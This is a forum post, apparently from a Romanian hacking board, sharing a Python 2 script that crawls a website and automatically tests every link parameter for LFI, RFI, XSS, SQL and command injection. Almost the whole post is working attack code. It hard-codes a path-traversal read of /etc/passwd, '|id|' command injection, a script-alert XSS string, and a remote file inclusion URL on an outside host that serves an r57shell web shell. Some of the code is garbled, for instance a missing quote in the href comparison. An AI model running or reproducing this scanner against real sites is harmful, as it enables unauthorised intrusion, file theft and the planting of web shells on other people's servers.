Jump to content
Jimmy

Python vuln scanner

Recommended Posts

Posted

Scaneaza dupa vuln LFI,XSS,RFI,SQL,CMD

#!/usr/bin/python

#LinkScanSingle will take a site and

#collect links from the source. If the link

#contains a = it checks LFI,XSS,RFI,SQL,CMD injection

#searching source (simple)

#If your going to use a different shell then the

#one I have supplied, you will need to change line

#54 (r57shell) to something in your shell source.

from sgmllib import SGMLParser

import sys, urllib, httplib, re, urllib2, sets, socket

socket.setdefaulttimeout(5)

class URLLister(SGMLParser):

def reset(self):

SGMLParser.reset(self)

self.urls = []

def start_a(self, attrs):

href = [v for k, v in attrs if k==href]

if href:

self.urls.extend(href)

def parse_urls(links):

urls = []

for link in links:

num = link.count("=")

if num > 0:

for x in xrange(num):

x = x+1

if link[0] == "/" or link[0] == "?":

url = site+link.rsplit("=",x)[0]+"="

else:

url = link.rsplit("=",x)[0]+"="

if url.find(site.split(".",1)[1]) == -1:

url = site+url

if url.count("//") > 1:

url = "http://"+url[7:].replace("//","/",1)

urls.append(url)

urls = list(sets.Set(urls))

return urls

def main(host):

print "\n\t[+] Testing:",host,"\n"

try:

if verbose == 1:

print "[+] Checking XSS"

xss(host)

except(urllib2.HTTPError, urllib2.URLError), msg:

#print "[-] XSS Error:",msg

pass

try:

if verbose == 1:

print "[+] Checking LFI"

lfi(host)

except(urllib2.HTTPError, urllib2.URLError), msg:

#print "[-] LFI Error:",msg

pass

try:

if verbose == 1:

print "[+] Checking RFI"

rfi(host)

except(urllib2.HTTPError, urllib2.URLError), msg:

#print "[-] RFI Error:",msg

pass

try:

if verbose == 1:

print "[+] Checking CMD"

cmd(host)

except(urllib2.HTTPError, urllib2.URLError), msg:

#print "[-] CMD Error:",msg

pass

try:

if verbose == 1:

print "[+] Checking SQL"

sql(host)

except(urllib2.HTTPError, urllib2.URLError), msg:

#print "[-] SQL Error:",msg

pass

def rfi(host):

try:

source = urllib2.urlopen(host+RFI).read()

if re.search("r57shell", source):

print "[+] RFI:",host+RFI

else:

if verbose == 1:

print "[-] Not Vuln."

except(),msg:

#print "[-] Error Occurred",msg

pass

def xss(host):

source = urllib2.urlopen(host+XSS).read()

if re.search("XSS", source) != None:

print "[!] XSS:",host+XSS

else:

if verbose == 1:

print "[-] Not Vuln."

def sql(host):

for pload in SQL:

source = urllib2.urlopen(host+pload).read()

if re.search("Warning:", source) != None:

print "[!] SQL:",host+pload

else:

if verbose == 1:

print "[-] Not Vuln."

def cmd(host):

source = urllib2.urlopen(host+CMD).read()

if re.search("uid=", source) != None:

print "[!] CMD:",host+CMD

else:

if verbose == 1:

print "[-] Not Vuln."

def lfi(host):

source = urllib2.urlopen(host+LFI).read()

if re.search("root:", source) != None:

print "[!] LFI:",host+LFI

else:

if verbose == 1:

print "[-] Not Vuln."

source = urllib2.urlopen(host+LFI+"%00").read()

if re.search("root:", source) != None:

print "[!] LFI:",host+LFI+"%00"

else:

if verbose == 1:

print "[-] Not Vuln. w/ Null Byte"

print "\n\t d3hydr8[at]gmail[dot]com LinkScanSingle v1.3"

print "\t-------------------------------------------------\n"

if len(sys.argv) not in [2,3]:

print "Usage : ./linkscan.py <site> [option]"

print "Ex: ./linkscan.py Google -verbose"

print "\n\t[Option]"

print "\t\t-verbose/-v | Verbose Output\n"

sys.exit(1)

LFI = "../../../../../../../../../../../../etc/passwd"

RFI = "http://yozurino.com/r.txt?"

RFI_TITLE = "Target"

XSS = "%22%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E"

CMD = "|id|"

SQL = ["-1","999999"] #Add more or change sql payloads

site = sys.argv[1].replace("\n","")

print "\n[+] Collecting:",site

try:

if sys.argv[2].lower() == "-v" or sys.argv[2].lower() == "-verbose":

verbose = 1

print "[+] Verbose Mode On\n"

except(IndexError):

print "[-] Verbose Mode Off\n"

verbose = 0

pass

site = site.replace("http://","").rsplit("/",1)[0]+"/"

site = "http://"+site.lower()

try:

usock = urllib.urlopen(site)

parser = URLLister()

parser.feed(usock.read().lower())

parser.close()

usock.close()

except(IOError, urllib2.URLError), msg:

print "[-] Error Connecting to",site

print "[-]",msg

sys.exit(1)

urls = parse_urls(parser.urls)

print "[+] Links Found:",len(urls)

for url in urls:

try:

main(url)

except(KeyboardInterrupt):

pass

print "\n[-] Done\n"

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...